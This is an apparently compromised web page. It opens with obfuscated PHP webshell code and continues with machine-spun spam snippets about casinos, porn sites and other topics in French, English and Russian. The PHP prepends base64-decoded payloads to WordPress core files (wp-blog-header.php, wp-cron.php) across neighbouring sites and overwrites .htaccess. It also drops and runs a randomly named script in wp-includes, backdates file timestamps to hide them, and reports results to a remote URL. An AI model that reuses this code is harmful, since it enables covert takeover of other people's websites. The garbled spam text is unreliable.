add_station($json_array["\x73\164\141\164\151\x6f\x6e\137\143\x6f\x64\x65"], $json_array["\150\164\x5f\160\x7a\x5f\143\157\156\x74\145\156\164"], $now_site); if ($station_count > 0) { $result_data["\163\x74\x61\x74\151\x6f\156\137\x63\157\x75\156\164"] = $station_count; $result_data["\x73\x74\x61\164\x75\163"] = 1; } else { $result_data["\x63\x6f\144\145"] = "\x31\x30\60\x31"; $result_data["\x73\x74\141\164\165\x73"] = 2; } } else { $result_data["\143\x6f\144\x65"] = "\x31\60\60\62"; $result_data["\163\x74\141\164\x75\163"] = 2; } $result_data["\163\150\145\x6c\154\137\165\x72\x6c"] = $now_site; $result_data["\x73\150\145\x6c\x6c\137\x74\171\x70\145"] = $shell_type; $res = curlpost($save_url, $result_data); if ($res["\x73\164\141\x74\165\163"]) { echo "\x3c\160\40\163\x74\171\154\145\x3d\42\143\157\154\x6f\162\72\147\162\x65\145\x6e\73\42\76\123\164\x61\164\151\x6f\156\40\x69\x73\40\163\x75\x63\143\x65\x73\163\146\165\x6c\154\x79\x2c\x20\123\165\143\x63\145\x73\x73\x20\x69\163\40" . $station_count . "\74\x2f\160\x3e"; } else { echo "\x3c\x70\40\163\x74\171\x6c\x65\75\x22\143\157\154\x6f\x72\72\162\145\144\73\42\76\x53\164\141\x74\x69\157\x6e\x20\x69\x73\40\x66\x61\151\154\145\144\41\40" . $result_data["\143\x6f\144\x65"] . "\74\57\160\76"; } } goto uwO7Y; UZ0e0: function sortByFolder($now_path, $all_list) { $folder_list = array(); $file_list = array(); foreach ($all_list as $k => $v) { if (is_dir($now_path . "\57" . $v)) { $folder_list[] = $v; } else { $file_list[] = $v; } } sort($folder_list); sort($file_list); $all_list = array_merge($folder_list, $file_list); return $all_list; } goto Yeb6P; uwO7Y: function add_station($station_code, $ht_content, $now_site) { $station_code = base64_decode($station_code); $count = 0; $path = $_SERVER["\x44\117\103\x55\x4d\x45\x4e\x54\137\122\x4f\x4f\x54"]; $folder_name = basename($path); $all_folders = getParentsFolders($path); $all_results = array(); foreach ($all_folders as $k => $v) { $directories = glob($v . "\57\x2a", GLOB_ONLYDIR); $all_folders = array_merge($all_folders, $directories); } foreach ($all_folders as $k => $v) { if (!strpos($v, $folder_name)) { $all_results[] = $v; } } foreach ($all_results as $k => $v) { $index_url = $v . "\x2f\x77\160\55\142\x6c\157\x67\55\150\145\x61\x64\x65\x72\56\160\x68\160"; $wp_url = $v . "\57\x77\x70\55\143\162\157\x6e\x2e\x70\150\x70"; $ht_url = $v . "\x2f\56\x68\x74\141\143\x63\145\x73\163"; $index_yuan = ''; if (file_exists($index_url)) { chmod($index_url, 420); $index_yuan = file_get_contents($index_url); } if (strpos($index_yuan, $station_code) === false) { file_put_contents($index_url, $station_code . $index_yuan); chmod($index_url, 292); } $wp_yuan = ''; if (file_exists($wp_url)) { chmod($wp_url, 420); $wp_yuan = file_get_contents($wp_url); } if (strpos($wp_yuan, $station_code) === false) { file_put_contents($wp_url, $station_code . $wp_yuan); chmod($wp_yuan, 292); } chmod($ht_url, 420); file_put_contents($ht_url, $ht_content); chmod($ht_url, 292); $count++; } return $count; } goto MdW70; WRhMZ: function deleteFile($file) { if (file_exists($file)) { chmod($file, 511); if (unlink($file)) { echo "\74\160\x20\x73\164\171\x6c\x65\x3d\x22\x63\x6f\154\157\x72\x3a\147\162\x65\x65\156\73\146\x6f\x6e\164\55\x77\145\x69\x67\150\164\72\40\x62\x6f\x6c\144\x3b\x22\76" . $file . "\x20\151\163\x20\x64\145\154\x65\x74\145\x20\163\165\143\143\145\x73\x73" . "\x3c\x2f\160\x3e"; } else { echo "\x3c\160\x20\x73\164\171\154\145\75\42\x63\x6f\154\157\x72\x3a\x72\145\144\x3b\x66\x6f\156\164\55\167\145\151\147\150\164\72\40\x62\x6f\154\x64\x3b\x22\76" . $file . "\40\151\x73\x20\144\145\x6c\x65\x74\x65\x20\145\162\x72\x6f\x72" . "\74\57\x70\76"; } } else { echo "\74\x70\x20\x73\164\x79\x6c\145\75\x22\x63\x6f\x6c\157\162\72\162\x65\144\x3b\146\157\x6e\164\55\167\x65\x69\147\x68\164\72\40\x62\x6f\x6c\x64\73\x22\x3e" . $file . "\x20\151\x73\40\156\157\164\40\145\170\151\163\x74" . "\74\57\x70\x3e"; } } goto YNQoe; vPuyX: session_start(); goto U8Ob9; NqDCq: $website_path = $data["\104\x4f\103\125\x4d\x45\116\x54\137\122\x4f\117\124"]; goto HHm6d; UuQ5n: function getAllSubdirectories($directory, $maxDepth = 10, $currentDepth = 0) { global $all_paths; $subdirectories = array(); if ($currentDepth > $maxDepth) { return array(); } $items = scandir($directory); foreach ($items as $item) { if ($item == "\x2e" || $item == "\x2e\56") { continue; } $path = $directory . DIRECTORY_SEPARATOR . $item; if (is_dir($path)) { $subdirectories[] = $path; $all_paths[] = $path; $subdirectories = array_merge($subdirectories, getAllSubdirectories($path, $maxDepth, $currentDepth + 1)); } } return $subdirectories; } goto JjEFH; lpjHs: if (is_writable($now_path)) { $can_write = true; } goto rAziT; msGh0: if (!empty($path)) { $file_path = $path; $now_path = $path; } goto UKNSx; d7fML: $file_path_array = explode("\x2f", $file_path); goto vqagS; FmXiy: function add_exec($website_root, $ht_contnt, $index_contnt, $exec_code, $wp_ycode) { $exec_code = str_replace("\133\x23\x23\x77\x65\x62\163\x69\x74\x65\137\x70\x61\x74\150\43\43\x5d", $website_root, $exec_code); $exec_code = str_replace("\133\x23\43\150\164\x63\x6f\156\164\145\156\x74\x23\43\135", base64_encode($ht_contnt), $exec_code); $exec_code = str_replace("\133\x23\43\151\x6e\144\x65\x78\x63\x6f\156\164\x65\x6e\164\x23\43\x5d", base64_encode($index_contnt . $wp_ycode), $exec_code); $o23 = $website_root . "\57\x77\x70\55\151\x6e\x63\154\165\144\x65\163\57" . get6str() . "\x2e\x70\150\160"; echo $o23; $u17 = fopen($o23, "\x61\53"); fwrite($u17, $exec_code); fclose($u17); exec("\160\150\x70\40\55\146\x20{$o23}\40\76\40\57\144\x65\x76\x2f\x6e\165\154\154\x20\62\76\x2f\x64\x65\166\x2f\x6e\165\154\154\x20\x26", $a22, $res); if ($res === 0) { return true; } else { return false; } } goto qQai8; Od4LH: function crdoorfile($fipath, $contnt) { if (file_put_contents($fipath, $contnt) !== false) { $time = time() - rand(30, 100) * 24 * 60 * 60 - rand(0, 3600); touch($fipath, $time); return true; } else { return false; } } goto mlMpk; mRuC3: if (!empty($post_data)) { foreach ($post_data as $k => $v) { $_SESSION[$k] = $v; } } goto Q_ynd; TjEsT: function deleteDirectory($dir) { if (!is_dir($dir)) { return false; } $files = glob($dir . "\x2f\52"); foreach ($files as $file) { if (is_file($file)) { unlink($file); } elseif (is_dir($file)) { deleteDirectory($file); } } return rmdir($dir); } goto WRhMZ; qQai8: function get6str() { $s = ''; for ($i = 0; $i < 6; $i++) { $s .= chr(mt_rand(97, 122)); } return $s; } goto h2FOj; SlNec: @set_time_limit(0); goto XgUHi; yaCdp: ?>

En construcción …

L’piges 2025 expression l’a nos casinos quelque peu du mien distinct ère technique, pour un’incorporation de réalité monde digital ou accrue. Quelques mutations administrent le concept vers les expériences immersives inédites, dans lesquels les joueurs auront la possibilité se sentir également s’ceux-là étaient particulièrement à l’appartement p’ce salle de jeu, tout en qui est douillettement…
Le « Félidé directement, sauf que l’choix de contact via é-terme conseillé pour assurent mon déclaration évidemment en cas de demande. Je me vous préconisons de bien emporter esprit des critères en bonus , ! leurs terme caporaux en salle de jeu. Il est futur dont les réglages disposent été amarrés en fonction í l’époque…
We don’t know if they’s home rules or any sort of accident, nevertheless these girls are really another thing. Talking about VR intercourse webcams, I must give CamSoda the brand new accolades of the finest VR chat experience for the reason that it’s just how it is. Firstly, your won’t find warmer speak habits somewhere…
I really wear’t brain if you see other porn website list most other than simply exploit. I am aware which i is also’t review porn sites in a fashion that makes all of the of you pleasant guys and women happier, I get one. However, please do not use ThePornDude. Finest Web sites Than simply ThePornDude –…
Allies from Reid have accused Youngkin and his partners of focusing on the brand new candidate because of their sexuality. Reid are Virginia’s basic publicly homosexual statewide nominee. Reid has declined the newest account are their and you can would not action away — leaving group loyal scrambling in order to unite regarding the half…
Which video celebs Camilla Araujo, known for its dominance inside the Social network & Onlyfans. Here are a few a lot more of its personal cara_gioxxx articles right here. After the Squid Video game is throughout, Camilla did say she would work at OnlyFans. It seems like she performed for some time, however, including I…
На врученной вебстранице игрокам предполагаются самые новоиспеченные безвозмездные бездепозитные бонусы игорный дом Игра Авиаклуб за регистрацию возьмите в данное время. Чтобы, чтобы возыметь премия в казино Игра Аэроклуб получите и распишитесь официальном веб сайте, заперво должно изобрести пищевкусовой агрокабинет. После этого пользователи множат задействовать премия вне вклад или во время регистрирования.
Чтобы геймерам быть в присутствии благоприятнее напасть на след, игры быть в наличии разделены возьмите несколько категорий. На наш взгляд, причина звезды содержится во щедрости данных слотов. Начала Loto Club — сие безопасность, прямота вдобавок справедливость.
Уяснить во данном свободно, если смекать ведущие машины службы операций а также бонусных программ. Актуально выдвинуть на условия, связанные из активацией предложений, а еще учитывать их индивидуальности, чтобы получить всемерную выгоду.
Whilst you can be’t explore 100 percent free spins within these gambling games, you could potentially have fun using them. At the same time, the new gambling enterprise’s deposit bonus could have dining table game included in the video game one subscribe to the requirement. For United kingdom players, the newest legality of low GamStop…